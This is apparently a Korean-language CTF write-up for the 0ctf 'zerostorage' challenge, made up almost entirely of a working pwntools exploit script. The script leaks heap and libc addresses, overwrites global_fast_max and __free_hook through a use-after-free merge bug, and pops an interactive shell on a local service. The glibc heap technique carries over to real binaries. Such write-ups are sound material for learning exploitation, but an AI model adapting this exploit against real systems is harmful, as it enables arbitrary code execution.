0ctf zerostorage 본문
※ 방법론을 적어놓은 익스플로잇 코드입니다.
후기 : global_fast_max를 덮고 chunk head를 사용하여 익스플로잇을 진행하는데,
pie, full relro등이 걸려있을때 한번쯤 시도해볼만한 방법인 것 같다.
from pwn import *
# Connection to the challenge service; host and port are hard-coded to a
# local instance, so the script only runs against a locally hosted copy.
s = remote('localhost', 4000)
def insert(data):
    """Drive menu option 1 (insert) with *data* as the new entry.

    Each prompt is read with recvuntil, echoed to stdout, and answered in
    order. The length prompt is answered with len(data) + 1 (presumably to
    cover the newline that sendline appends -- confirm against the service).
    """
    dialogue = (
        ('choice: ', '1'),
        ('Length of new entry: ', str(len(data) + 1)),
        ('Enter your data: ', data),
    )
    for expected_prompt, answer in dialogue:
        print s.recvuntil(expected_prompt)
        s.sendline(answer)
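def update(id, data):
    """Drive menu option 2 (update) to replace entry *id* with *data*.

    Each prompt is read with recvuntil, echoed to stdout, and answered in
    order. The length prompt is answered with the decimal length of *data*.

    Fix: the original passed ``len(str(data))`` -- an int -- straight to
    ``sendline``, which expects a string it can append the newline to; the
    length is now converted with ``str`` like the sibling ``insert`` helper.
    """
    dialogue = (
        ('choice: ', '2'),
        ('Entry ID: ', str(id)),
        ('Length of entry: ', str(len(data))),
        ('Enter your data: ', data),
    )
    for expected_prompt, answer in dialogue:
        print s.recvuntil(expected_prompt)
        s.sendline(answer)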
def merge(id1, id2):
    """Drive menu option 3 (merge) from entry *id1* into entry *id2*.

    Prompts are read with recvuntil, echoed to stdout, and answered in order.
    """
    prompts = ('choice: ', 'Merge from Entry ID: ', 'Merge to Entry ID: ')
    answers = ('3', str(id1), str(id2))
    for expected_prompt, answer in zip(prompts, answers):
        print s.recvuntil(expected_prompt)
        s.sendline(answer)
def delete(id):
    """Drive menu option 4 (delete) for entry *id*.

    Note that this helper waits for 'Your choice: ' whereas insert/update/
    merge wait for the shorter 'choice: '; both are kept as written.
    Prompts are echoed to stdout before each answer is sent.
    """
    choice_prompt = 'Your choice: '
    id_prompt = 'Entry ID: '
    print s.recvuntil(choice_prompt)
    s.sendline('4')
    print s.recvuntil(id_prompt)
    s.sendline(str(id))
def view(id):
    """Drive menu option 5 (view) for entry *id*.

    Only the prompts are consumed here; the caller is responsible for
    reading the entry contents that the service prints afterwards.
    """
    dialogue = (('Your choice: ', '5'), ('Entry ID: ', str(id)))
    for expected_prompt, answer in dialogue:
        print s.recvuntil(expected_prompt)
        s.sendline(answer)
# Populate seven entries (IDs 0..6) with 8-byte markers.
insert('A'*8)
insert('B'*8)
insert('C'*8)
insert('D'*8)
insert('E'*8)
insert('F'*8)
insert('G'*8)
# Free entry 0, merge entry 2 into itself, then view entry 0 and parse the
# bytes the service prints after its header line.
delete(0)
merge(2,2)
view(0)
print s.recvuntil('Entry No.0:\n')
# First two qwords of the viewed entry.
heap_leak = u64(s.recv(8))
leak = u64(s.recv(8))
# All of these offsets are specific to one libc build -- TODO confirm
# against the target's libc before reuse.
base = leak - 0x3be7b8
one_shot = base + 0x4647c
free_hook = base + 0x3C0B40
# The remaining two offsets are typed in interactively at run time rather
# than hard-coded; they are added to base as-is (decimal via int()).
global_fast_max = base + int(raw_input())
head = base + int(raw_input())
log.info('heap_leak : ' + hex(heap_leak))
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('one_shot : ' + hex(one_shot))
log.info('global_fast_max : ' + hex(global_fast_max))
log.info('head : ' + hex(head))
# Entry manipulation driven by the addresses computed above; see the
# write-up text at the top of the page for the approach.
insert('H'*8)
update(0, 'A'*8 + p64(global_fast_max - 0x10))
insert('X'*8)
merge(4,4)
update(8, p64(head))
insert('X'*8)
insert('P'*106)
# View entry 9: skip the first 0x60 printed bytes, then take one qword and
# XOR it with head to recover the value named rand.
view(9)
print s.recvuntil('Entry No.9:\n')
print s.recv(0x60)
xor = u64(s.recv(8))
rand = xor^head
log.info('xor : ' + hex(xor))
log.info('rand : ' + hex(rand))
# Final writes: entry 9 gets a header plus rand^free_hook, entry 6 gets
# one_shot, then entry 6 is deleted and the session is handed to the user.
update(9, 'A'*8 + p64(1) + p64(0x8) + p64(rand^free_hook))
update(6, p64(one_shot))
delete(6)
s.interactive()